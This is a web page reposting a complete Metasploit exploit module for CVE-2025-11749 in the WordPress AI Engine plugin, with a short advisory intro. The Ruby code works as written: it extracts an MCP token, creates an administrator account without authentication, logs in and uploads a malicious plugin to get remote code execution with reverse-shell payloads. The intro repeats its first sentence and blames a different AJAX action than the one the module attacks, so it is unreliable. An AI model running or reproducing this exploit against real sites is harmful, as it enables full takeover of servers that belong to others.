WordPress AI Engine 3.1.3 Remote Code Execution
WordPress AI Engine 3.1.3 Remote Code Execution
WordPress AI Engine plugin versions up to 3.1.3 contained a WordPress AI Engine plugin versions up to 3.1.3 contained a critical Remote Code Execution (RCE) vulnerability. This flaw allowed **unauthenticated attackers** to execute arbitrary PHP code on the affected server.

The vulnerability stemmed from insufficient validation and sanitization of user-supplied input, specifically within the `ai_engine_process_code_block` AJAX action. By crafting a malicious request, attackers could bypass security checks and inject their own code.

Successful exploitation granted full control over the compromised WordPress site and potentially the underlying server. Users are urged to immediately update to version 3.1.4 or higher to patch this critical security hole.

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking

include Msf::Payload::Php
include Msf::Exploit::FileDropper
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::Remote::HTTP::Wordpress

prepend Msf::Exploit::Remote::AutoCheck

ERROR_PATTERN = /already exists|username.*taken|user.*exists/i
SUCCESS_PATTERN = /User (?:created|updated|#\d+ updated)|success|created/i

def initialize(info = {})
super(
update_info(
info,
'Name' => 'WordPress AI Engine Plugin MCP Unauthenticated Admin Creation to RCE',
'Description' => %q{
This module exploits an unauthenticated vulnerability in the WordPress AI Engine plugin
(versions <= 3.1.3). The vulnerability allows an attacker to create an administrator account
via the MCP (Model Context Protocol) endpoint without authentication. The module supports
both `/wp-json/mcp/v1/` and `/?rest_route=/mcp/v1/` endpoints. Once an administrator
account is created, the module uploads and executes a malicious plugin to achieve remote
code execution (RCE).
},
'Author' => [
'Emiliano Versini', # Vulnerability discovery
'Khaled Alenazi (Nxploited)', # PoC
'Valentin Lobstein <chocapikk[at]leakix.net>', # Metasploit module
'dledda-r7' # Reviewer
],
'License' => MSF_LICENSE,
'References' => [
['CVE', '2025-11749'],
['URL', 'https://github.com/Nxploited/CVE-2025-11749']
],
'Platform' => %w[php unix linux win],
'Arch' => [ARCH_PHP, ARCH_CMD],
'DisclosureDate' => '2025-11-04',
'DefaultTarget' => 0,
'Privileged' => false,
'Targets' => [
[
'PHP In-Memory',
{
'Platform' => 'php',
'Arch' => ARCH_PHP
# tested with php/meterpreter/reverse_tcp
}
],
[
'Unix/Linux Command Shell',
{
'Platform' => %w[unix linux],
'Arch' => ARCH_CMD
# tested with cmd/linux/http/x64/meterpreter/reverse_tcp
}
],
[
'Windows Command Shell',
{
'Platform' => 'win',
'Arch' => ARCH_CMD
# tested with cmd/windows/http/x64/meterpreter/reverse_tcp
}
]
],
'Notes' => {
'Stability' => [CRASH_SAFE],
'Reliability' => [REPEATABLE_SESSION],
'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
}
)
)

register_options(
[
OptString.new('USERNAME', [true, 'Username to create', Faker::Internet.username]),
OptString.new('PASSWORD', [true, 'Password for the new user', Faker::Internet.password(min_length: 8)]),
OptString.new('EMAIL', [true, 'Email for the new user', Faker::Internet.email])
]
)
end

def check
return CheckCode::Unknown unless wordpress_and_online?

plugin_check = check_plugin_version_from_readme('ai-engine', '3.1.4')
return plugin_check if plugin_check == CheckCode::Safe

@token = find_token
return CheckCode::Safe('MCP token not found. Plugin may be patched or not configured.') unless @token

CheckCode::Appears
end

def exploit
fail_with(Failure::NotFound, 'The target does not appear to be using WordPress') unless wordpress_and_online?

@token ||= find_token
fail_with(Failure::NotVulnerable, 'MCP token not found. Plugin may be patched or not configured.') unless @token

username = datastore['USERNAME']
password = datastore['PASSWORD']
email = datastore['EMAIL']

result = create_admin_user(@token, username, password, email)
fail_with(Failure::UnexpectedReply, 'Failed to create administrator account.') if result == false

if result == :user_exists
print_warning('User already exists, updating password and continuing exploitation...')
update_user_password(@token, username, password)
end

admin_cookie = wordpress_login(username, password)
unless admin_cookie
error_msg = 'Failed to log in to WordPress admin.'
error_msg += ' User may exist with a different password.' if result == :user_exists
fail_with(Failure::UnexpectedReply, error_msg)
end

upload_and_execute_payload(admin_cookie)
end

# REST API helpers
def send_rest_request(rest_path, method: 'GET', data: nil)
opts = {
'method' => method,
'ctype' => method == 'POST' ? 'application/json' : nil,
'data' => data
}

uri = normalize_uri(target_uri.path, 'wp-json', rest_path)
res = send_request_cgi(opts.merge('uri' => uri))
return res if res&.code == 200

vars_get = { 'rest_route' => rest_path }
send_request_cgi(opts.merge('uri' => normalize_uri(target_uri.path), 'vars_get' => vars_get))
end

def find_token
extract_token_from_routes(send_rest_request('/'))
end

def extract_token_from_routes(res)
return nil unless res&.code == 200

routes = res.get_json_document&.dig('routes')
return nil unless routes.is_a?(Hash)

mcp_regex = %r{^/mcp/v1/([^/]+)/sse$}
routes.each_key do |route|
next unless route.is_a?(String)

match = route.match(mcp_regex)
next unless match

token = match[1]
next if token == 'sse' || token.empty?

return token
end
nil
end

# MCP API helpers
def send_mcp_request(token, segments, method: 'GET', data: nil)
path = "/mcp/v1/#{token}/#{segments.join('/')}"
send_rest_request(path, method: method, data: data)
end

def build_mcp_payload(tool_name, arguments)
{
'jsonrpc' => '2.0',
'id' => rand(1..999_999),
'method' => 'tools/call',
'params' => {
'name' => tool_name,
'arguments' => arguments
}
}.to_json
end

def send_mcp_tool_call_raw(token, tool_name, arguments)
payload = build_mcp_payload(tool_name, arguments)
res = send_mcp_request(token, ['sse'], method: 'POST', data: payload)
return nil unless res
return nil unless res.code == 200

json_response = res.get_json_document
return nil unless json_response.is_a?(Hash)

json_response.dig('result', 'content')
end

def send_mcp_tool_call(token, tool_name, arguments)
payload = build_mcp_payload(tool_name, arguments)
res = send_mcp_request(token, ['sse'], method: 'POST', data: payload)
return false unless res
return true if res.code == 204
return false unless res.code == 200

json_response = res.get_json_document
return false unless json_response.is_a?(Hash)

error = json_response['error']
return :user_exists if error.is_a?(Hash) && error['code'] == 'existing_user_login'
return :user_exists if error.is_a?(Hash) && error['message']&.match?(ERROR_PATTERN)

result_content = json_response.dig('result', 'content')
return true if result_content&.any? { |item| item['text']&.match?(SUCCESS_PATTERN) }

body = res.body.to_s
return :user_exists if body =~ ERROR_PATTERN
return true if body =~ SUCCESS_PATTERN

false
end

# User management
def get_user_id(token, username)
arguments = {
'search' => username,
'search_columns' => ['user_login']
}

result_content = send_mcp_tool_call_raw(token, 'wp_get_users', arguments)
return nil unless result_content.is_a?(Array)

result_content.each do |item|
next unless item.is_a?(Hash) && item['text']

text = item['text'].to_s
begin
users = JSON.parse(text)
users = [users] unless users.is_a?(Array)
user = users.find { |u| u['user_login'] == username }
return user['ID'].to_i if user && user['ID']
rescue JSON::ParserError
next
end
end

nil
end

def create_admin_user(token, username, password, email)
arguments = {
'user_login' => username,
'user_email' => email,
'user_pass' => password,
'role' => 'administrator'
}
send_mcp_tool_call(token, 'wp_create_user', arguments)
end

def update_user_password(token, username, password)
user_id = get_user_id(token, username)
return false unless user_id

arguments = {
'ID' => user_id,
'fields' => {
'user_pass' => password
}
}
result = send_mcp_tool_call(token, 'wp_update_user', arguments)
print_warning('Password update may have failed, attempting login anyway...') unless result
result
end

# Payload execution
def upload_and_execute_payload(admin_cookie)
plugin_name = "wp_#{Rex::Text.rand_text_alphanumeric(5).downcase}"
payload_name = "ajax_#{Rex::Text.rand_text_alphanumeric(5).downcase}"

zip = generate_plugin(plugin_name, payload_name)
fail_with(Failure::UnexpectedReply, 'Failed to upload the payload') unless wordpress_upload_plugin(plugin_name, zip.pack, admin_cookie)

register_files_for_cleanup("#{payload_name}.php", "#{plugin_name}.php")
register_dir_for_cleanup("../#{plugin_name}")
payload_file = "#{payload_name}.php"
payload_uri = normalize_uri(wordpress_url_plugins, plugin_name, payload_file)
send_request_cgi('uri' => payload_uri, 'method' => 'GET')
end
end
Social Media Share
About Contact Terms of Use Privacy Policy
© Khalil Shreateh — Cybersecurity Researcher & White-Hat Hacker — Palestine 🇵🇸
All content is for educational purposes only. Unauthorized use of any information on this site is strictly prohibited.